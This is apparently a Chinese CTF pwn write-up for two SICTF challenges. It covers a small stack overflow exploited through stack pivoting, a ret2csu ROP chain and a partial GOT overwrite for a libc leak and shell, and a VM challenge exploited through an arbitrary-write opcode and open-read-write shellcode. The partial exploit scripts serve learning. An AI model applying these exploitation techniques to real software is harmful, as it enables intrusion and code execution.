SICTF PWN题解：栈风水和signin_vm<\/h1>

1. 栈风水题目分析<\/h2>

1.1 程序保护机制<\/h3>
Arch: amd64-64-little<\/li>
RELRO: Full RELRO<\/li>
Stack: No canary found<\/li>
NX: NX enabled<\/li>
PIE: No PIE (0x3fc000)<\/li>
RUNPATH: \/root\/glibc-all-in-one\/libs\/2.35-0ubuntu3.8_amd64\/<\/li> <\/ul>
1.2 漏洞点<\/h3>
__int64<\/span> __fastcall<\/span> main<\/span>(int<\/span> a1, char<\/span> **<\/span>a2, char<\/span> **<\/span>a3)
<\/span><\/span>{
<\/span><\/span>  _BYTE buf[160<\/span>]; \/\/ [rsp+0h] [rbp-A0h] BYREF
<\/span><\/span><\/span><\/span>  read(0<\/span>, buf, 0xB0uLL<\/span>);
<\/span><\/span>  return<\/span> 0LL<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
存在0x10字节的栈溢出（buf大小160字节，但可读入176字节）<\/li>
攻击方向：栈迁移<\/li>
<\/ul>
1.3 可利用的gadget<\/h3>

csu_init函数中的gadget<\/strong>：<\/li>
<\/ol>
.text:00000000004006<\/span>B0<\/span> mov<\/span> rdx<\/span>, r15<\/span>
<\/span><\/span>.text:00000000004006<\/span>B3<\/span> mov<\/span> rsi<\/span>, r14<\/span>
<\/span><\/span>.text:00000000004006<\/span>B6<\/span> mov<\/span> edi<\/span>, r13d<\/span>
<\/span><\/span>.text:00000000004006<\/span>B9<\/span> call<\/span> ds<\/span>:(funcs_4006B9<\/span> - 600<\/span>DE8h<\/span>)[r12<\/span> +<\/span> rbx<\/span>*8<\/span>]
<\/span><\/span>.text:00000000004006<\/span>BD<\/span> add<\/span> rbx<\/span>, 1<\/span>
<\/span><\/span>.text:00000000004006<\/span>C1<\/span> cmp<\/span> rbp<\/span>, rbx<\/span>
<\/span><\/span>.text:00000000004006<\/span>C4<\/span> jnz<\/span> short<\/span> loc_4006B0<\/span>
<\/span><\/span><\/code><\/pre>
特殊函数sub_4004F7<\/strong>：<\/li>
<\/ol>
.text:00000000004004<\/span>F7<\/span> sub_4004F7<\/span> proc<\/span> near<\/span>
<\/span><\/span>.text:00000000004004<\/span>F7<\/span> push<\/span> rbp<\/span>
<\/span><\/span>.text:00000000004004<\/span>F8<\/span> mov<\/span> rbp<\/span>, rsp<\/span>
<\/span><\/span>.text:00000000004004<\/span>FB<\/span> mov<\/span> rax<\/span>, 0<\/span>FFFF7FFFFFFFFFFFh<\/span>
<\/span><\/span>.text:0000000000400505<\/span> mov<\/span> [rbp<\/span>+<\/span>var_8<\/span>], rax<\/span>
<\/span><\/span>.text:0000000000400509<\/span> mov<\/span> rdx<\/span>, [rbp<\/span>+<\/span>var_8<\/span>]
<\/span><\/span>.text:000000000040050<\/span>D<\/span> mov<\/span> rax<\/span>, 0<\/span>FFFF000000000000h<\/span>
<\/span><\/span>.text:0000000000400517<\/span> and<\/span> rdx<\/span>, rax<\/span>
<\/span><\/span>.text:000000000040051<\/span>A<\/span> mov<\/span> rax<\/span>, cs<\/span>:read_ptr<\/span>
<\/span><\/span>.text:0000000000400521<\/span> add<\/span> rax<\/span>, rdx<\/span>
<\/span><\/span>.text:0000000000400524<\/span> mov<\/span> cs<\/span>:num<\/span>, rax<\/span>
<\/span><\/span>.text:000000000040052<\/span>B<\/span> nop<\/span>
<\/span><\/span>.text:000000000040052<\/span>C<\/span> pop<\/span> rbp<\/span>
<\/span><\/span>.text:000000000040052<\/span>D<\/span> retn<\/span>
<\/span><\/span><\/code><\/pre>1.4 攻击思路<\/h3>

第一次往bss段上利用csu第一次调用read函数扩充ROP空间<\/li>
第二次read清理高两位<\/li>
第三次read修改最低两字节为libc里的write的低两字节（需要爆破1\/16）<\/li>
csu调用修改好的write，输出got表拿libc<\/li>
第四次read写入system("\/bin\/sh")<\/li>
<\/ol>
1.5 EXP代码关键部分<\/h3>
leave =<\/span> 0x0000000000400669<\/span>
<\/span><\/span>bss =<\/span> 0x0000000000601E00<\/span>
<\/span><\/span>main =<\/span> 0x0000000000400640<\/span>
<\/span><\/span>fun2 =<\/span> 0x00000000004004F7<\/span>
<\/span><\/span>csu_1 =<\/span> 0x0000000004006CA<\/span>
<\/span><\/span>csu_2 =<\/span> 0x0000000004006B0<\/span>
<\/span><\/span>read =<\/span> 0x400400<\/span>
<\/span><\/span>read_got =<\/span> 0x000000000600FE8<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> csu<\/span>(fun, rdi, rsi, rdx):
<\/span><\/span>    return<\/span> p64(csu_1) +<\/span> p64(0<\/span>) +<\/span> p64(1<\/span>) +<\/span> p64(fun) +<\/span> p64(rdi) +<\/span> p64(rsi) +<\/span> p64(rdx) +<\/span> p64(csu_2) +<\/span> p64(0<\/span>)*<\/span>7<\/span>
<\/span><\/span>
<\/span><\/span>rop =<\/span> p64(fun2)
<\/span><\/span>rop +=<\/span> csu(read_got, 0<\/span>, addr +<\/span> 6<\/span>, 2<\/span>)
<\/span><\/span>rop +=<\/span> csu(read_got, 0<\/span>, addr, 2<\/span>)
<\/span><\/span>rop +=<\/span> csu(addr, 1<\/span>, read_got, 0x8<\/span>)
<\/span><\/span>rop +=<\/span> csu(read_got, 0<\/span>, 0x602020<\/span>, 0x100<\/span>)
<\/span><\/span><\/code><\/pre>2. signin_vm题目分析<\/h2>
2.1 关键函数分析<\/h3>
unsigned<\/span> __int64<\/span> sub_1437<\/span>()
<\/span><\/span>{
<\/span><\/span>  int<\/span> v0; \/\/ eax
<\/span><\/span><\/span><\/span>  int<\/span> v2; \/\/ [rsp+4h] [rbp-1Ch]
<\/span><\/span><\/span><\/span>  
<\/span><\/span>  v2 =<\/span> rand() %<\/span> 1131796<\/span>;
<\/span><\/span>  v0 =<\/span> rand();
<\/span><\/span>  return<\/span> ((v2 +<\/span> (v2 ^<\/span> v0) +<\/span> rand()) >><\/span> 4<\/span>) <<<\/span> 12<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
使用三次随机数生成一个地址<\/li>
需要爆破opcode("V")跳转的地址<\/li>
<\/ul>
2.2 关键opcode<\/h3>

'W'<\/strong>：可以对任意地址写<\/li>
'P'<\/strong>：写数据到寄存器<\/li>
'V'<\/strong>：跳到写入的ORW地方<\/li>
<\/ol>
2.3 攻击思路<\/h3>

爆破跳转地址<\/li>
使用opcode("P")写数据到寄存器<\/li>
使用opcode("W")写数据到跳转地址<\/li>
使用opcode("V")跳到写入的ORW地方<\/li>
<\/ol>
2.4 EXP代码关键部分<\/h3>
def<\/span> add<\/span>(op, choice, idx1, idx2, idx3, addr1, value):
<\/span><\/span>    op +=<\/span> p8(choice)
<\/span><\/span>    op +=<\/span> p8(idx1)
<\/span><\/span>    op +=<\/span> p8(idx2)
<\/span><\/span>    op +=<\/span> p8(idx3)
<\/span><\/span>    if<\/span> type(addr1) ==<\/span> int:
<\/span><\/span>        op +=<\/span> p64(addr1)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        op +=<\/span> addr1.<\/span>ljust(0x8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>    if<\/span> type(value) ==<\/span> int:
<\/span><\/span>        op +=<\/span> p64(value)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        op +=<\/span> value.<\/span>ljust(0x8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>    return<\/span> op
<\/span><\/span>
<\/span><\/span>def<\/span> write_data<\/span>(data, addr):
<\/span><\/span>    r =<\/span> b<\/span>''<\/span>
<\/span><\/span>    length =<\/span> len(data)
<\/span><\/span>    if<\/span> len(data) %<\/span> 8<\/span> !=<\/span> 0<\/span>:
<\/span><\/span>        length =<\/span> (8<\/span> -<\/span> len(data) %<\/span> 8<\/span>) +<\/span> len(data)
<\/span><\/span>    for<\/span> i in<\/span> range(length \/\/<\/span> 8<\/span>):
<\/span><\/span>        r +=<\/span> add(b<\/span>'P'<\/span>, 0<\/span>, 1<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, data[i*<\/span>8<\/span>:(i*<\/span>8<\/span>+<\/span>8<\/span>)])
<\/span><\/span>        r +=<\/span> add(b<\/span>'W'<\/span>, 0<\/span>, 1<\/span>, 0<\/span>, 0<\/span>, addr +<\/span> i*<\/span>8<\/span>, 0<\/span>)
<\/span><\/span>    return<\/span> r
<\/span><\/span>
<\/span><\/span>shellcode =<\/span> asm('''
<\/span><\/span><\/span>    xor rdi, rdi
<\/span><\/span><\/span>    sub rdi, 100
<\/span><\/span><\/span>    mov rsi, 0x<\/span>%x<\/span>
<\/span><\/span><\/span>    mov rax, 0x101
<\/span><\/span><\/span>    xor rdx, rdx
<\/span><\/span><\/span>    xor r10, r10
<\/span><\/span><\/span>    syscall
<\/span><\/span><\/span>    mov rdi, 0
<\/span><\/span><\/span>    mov rsi, 0x<\/span>%x<\/span>
<\/span><\/span><\/span>    mov rdx, 0x30
<\/span><\/span><\/span>    mov rax, 0
<\/span><\/span><\/span>    syscall
<\/span><\/span><\/span>    mov rdi, 1
<\/span><\/span><\/span>    mov rsi, 0x<\/span>%x<\/span>
<\/span><\/span><\/span>    mov rdx, 0x30
<\/span><\/span><\/span>    mov rax, 1
<\/span><\/span><\/span>    syscall
<\/span><\/span><\/span>'''<\/span> %<\/span> (cmd +<\/span> 0x100<\/span>, cmd +<\/span> 0x500<\/span>, cmd +<\/span> 0x500<\/span>), arch=<\/span>'amd64'<\/span>)
<\/span><\/span><\/code><\/pre>3. 总结<\/h2>
3.1 栈风水题目要点<\/h3>

利用有限的栈溢出进行栈迁移<\/li>
使用csu gadget构造ROP链<\/li>
通过多次read调用逐步控制程序流<\/li>
需要爆破1\/16的概率修改write函数地址<\/li>
<\/ol>
3.2 signin_vm题目要点<\/h3>

分析随机数生成地址的算法<\/li>
爆破跳转地址<\/li>
利用虚拟机opcode构造任意地址写<\/li>
最终通过shellcode实现ORW读取flag<\/li>
<\/ol>
这两道题目都展示了在有限条件下如何通过巧妙的利用现有漏洞和程序特性实现完整的攻击链，是很好的栈迁移和虚拟机逃逸的学习案例。<\/p>